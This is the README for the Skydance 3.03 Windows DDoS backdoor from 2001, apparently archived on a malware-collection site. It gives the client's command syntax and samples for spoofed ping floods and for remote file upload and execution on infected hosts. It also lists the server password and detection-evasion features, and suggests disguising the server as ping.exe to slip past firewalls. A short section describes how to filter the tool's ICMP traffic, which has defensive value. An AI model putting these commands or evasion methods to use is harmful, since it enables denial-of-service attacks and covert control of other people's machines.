Skydance 3.03
(Backdoor.Win32.SkyDance.303)

by Edrin

Written in Microsoft Visual C++

Released in March 2001

Made in Germany

more versions


This is - Skydance 3.03 - by [email protected] !
This is README.TXT-Version 3
http://skd.box.sk

Disclaimer - Read This First:
	Everything in this document is based on the results i got from developing skydance.
	Skydance 3.03 is an EXAMPLE of a Distributed Denial of Service attack!
	Use SKYDANCE 3.03 SOURCE, README AND BINARY ON YOUR OWN RISK, i will NEVER be
	responsible for any HARM or harmfull things that happen because SKYDANCE
	source was USED! That means I do NOT guarantee for any features and
	security-thing	and i do not guarantee that this program works properly!!!
	Indeed i guarantee for nothing ;)
	Use the binaries to test how a DDoS is used! Do not install the Skydance binary on
	a system that you do not own because this is probably illgeal! Do not use Skydance and it�s
	components to attack a server because this is illegal, too!
	Use this source and binary only to learn about how to defend/protect against Windows DDoS!
	Do not give a modify a binary and do not give it to another person!
	Use SKYDANCE 3.03 SOURCE, README AND BINARY ON YOUR OWN RISK!

	suggestions against SKD303DDoS: goto ---> 4. d)

#tested with win98 and win2k
------------------------------------------------------------------------------------------------------
password for binary files in ZIP: dontharm
if you compile it "as it is" without changes:
#######################################
#Note: for skd303s.exe <pass> = nerv  #
#######################################

	1. What is it?
	2. client usage:
	3. About source code:
	4. How to filter SKD303DDoS pongs
	5. ICMP "ability" of win32 winsock (Icmp�s you can recv)
	6. Some words about DDoS servers that use Windows OS.


1. What is it?

	Skydance 3.03 is a DDoS for win32 using RAW sockets.
	source includes this features:
	- communication with ICMP, including a simple std-windows-"abcd..." ping attack
	- can not be found with netstat -a (ICMP:)
	- can not be found with usual Port-Scanners (RAW:) 
	- on win2k-systems communication and attacks are spoofed (IP_HDRINCL:) 
	- server size can be packet to 17 K
	- client-source can be ported to unix because it is done as console app.
	- (ICMP tunnel) file(<65kb) can be sent within a spoofed ICMP packet, executes it after receive.

2. client usage:

	Usage:
	The Client will try to use a spoofed source address. You should test your
	spoofing-ability first to ensure that you can not be revealed. The test
	will fail on WinNT and Win9x/Me systems. It should not fail under Win2000.

	<spoofed-IP> and <target> must be in style of xxx.xxx.xxx.xxx
	By default it is 216.32.74.55 = www.yahoo.com
	<pass> must be <= 4 letters!

	- To test spoofing-ability:
	   skd303c spoofing
	
	- Get Server Info (always unspoofed packets!):
	   skd303c <server> <pass> info
	   Sample: skd303c myknight.com diva info
	
	- To attack with spoofed standart-windows-pings:
	   skd303c <server> <pass> kill <target> <time-in-minutes> <spoofed-IP>
	   Sample: skd303c myknight.com diva kill 166.166.166.166 10 12.34.56.78
	   <time-in-minutes> can be up to 1440

	- To send and exectue a file with a spoofed standart-windows-pong:
	   skd303c <server> <pass> fsend <file-name> <new-filename> <spoofed-IP>
	   Sample: skd303c myknight.com diva fsend c:\myfile.exe myfile.exe 98.76.54.32
	   <file-name> SIZE can be up to 6540 byte, <new-filename> can have up to 39 letters

	DO NOT HARM PEOPLE! HELP CHILDREN IN AFRICA!

	greetings, Edrin

3. About source code:

	why this source needed to be modified to abuse it:

	first of all: it is not possibel to receive ICMP_ECHOREQUESTS
	with winsock ( -> 5.) so I decided to use ICMP_ECHORESPONSE in my
	source. Anyway this makes it much more easier for Firewalls

	next thing: communication pong have std unix ping size...
	but anyway i�m not sure. 84 byte in total? (IP header 20 + ICMP 64)

	the std-windows pings are the only attack i added and this attack is
	not very powerful and a simple firewall might be able to stop an attack
	The size of this std windows ping is #define STANDART_PINGSIZE 60 (byte)
	that means the data flood is not as big as it could be!
	There are probably othere DoS that are much more effective. Anyway my win2k 
	550 MHz had 100% CPU usage in a 10 MBit local area net.

	In addition to that it would be neccessary that the info function returns
	the OS version to get sure that a server is "spoofable".

	Another thing that can reaveal skydance: i didn�t crypt the 
	unsigned char cCommand;	(the command in my message-struct)
	so a sniffer would always see a k(kill), i(info) or f(file)
	at position FULL_PACKET[35 ?] 
	For example someone could use the first password letter +/- xy for
	a "crypted" command or maybe some real crypto in my opinion a crypto
	is not realy necessary.

	And there is no self installing code in my source! 	

4. How to filter SKD303DDoS pongs
	As i already mentioned:
	In communictaion pongs:

	a) communictaion with unix 84-byte PONGS ! ICMP_ECHORESPONSE
	b) 'k', 'i', 'f' at position FULL_PACKET[35] or ICMP_STRUCT[15] (IPheader = 20 byte)
	c) an 'i' pong is UNSPOOFED! so TRACE-BACKE would possibel!
---->>	d) block each suspicious "ok-ICMP" in ( -> 5.) I THINK THIS WOULD PROTECT BEST!!!
	
	i have no more ideas, do you?

5. ICMP "ability" of win32 winsock (Icmp�s you can recv)
	Blocking each "ok-ICMP" might block communictation of each win-ICMP-DDoS
	I tested it in a few minutes, no warranty, proof it yourself!

	0 Echo reply. 				ok
	1 Reserved. 				ok
	2 Reserved. 				ok
	3 Destination unreachable. 		failed
	4 Source quench. 			failed
	5 Redirect. 				failed
	6 Alternate Host Address. 		ok
	7  					ok
	8 Echo request. 			failed	(this "would" be nice to receive)
	9 Router advertisement. 		ok
	10 Router solicitation. 		ok
	11 Time exceeded. 			failed
	12 Parameter problem. 			failed
	13 Timestamp request. 			failed
	14 Timestamp reply. 			ok
	15 Information request. 		ok
	16 Information reply. 			ok
	17 Address mask request. 		failed
	18 Address mask reply. 			ok
	19 Reserved (for security). 		ok
	20					ok
	-					  unknown
	29 Reserved (for robustness experiment).ok
	30 Traceroute. 				ok
	31 Conversion error. 			ok
	32 Mobile Host Redirect. 		ok
	33 IPv6 Where-Are-You. 			ok
	34 IPv6 I-Am-Here. 			ok
	35 Mobile Registration Request. 	ok
	36 Mobile Registration Reply. 		ok
	37 Domain Name request. 		ok
	38 Domain Name reply. 			ok
	39 SKIP Algorithm Discovery Protocol. 	ok
	40 Photuris, Security failures. 	ok
	41					ok
	-					  unknown
	255 Reserved. 				ok

6. Some words about DDoS from Windows OS.
	The new feature IP_HDRINCL that comes with win2k can make windows to a powerful
	DDoS server because it enables IP-spoofing!

	IP_HDRINCL in source:
	--> setsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt)); <--

	That means win2k-servers will become a base for DDoS that is equal to *nix servers.

	Anyway most windows systems remain dial-in computers that have dynamic IP. That means
	such a DDoS as SKD3.03 can not be used with it in a serious way. I think for such
	Computers the most threatoning DDoS remain IRC-"bots"!

	Firewalls that control each winsock access are quite good. They would probably detect
	DDoS servers. Anyway: Maybe you can replace ping.exe with a DDoS and maybe firewall does not
	detect a DDoS then...


Thx for reading,
[email protected]





MegaSecurity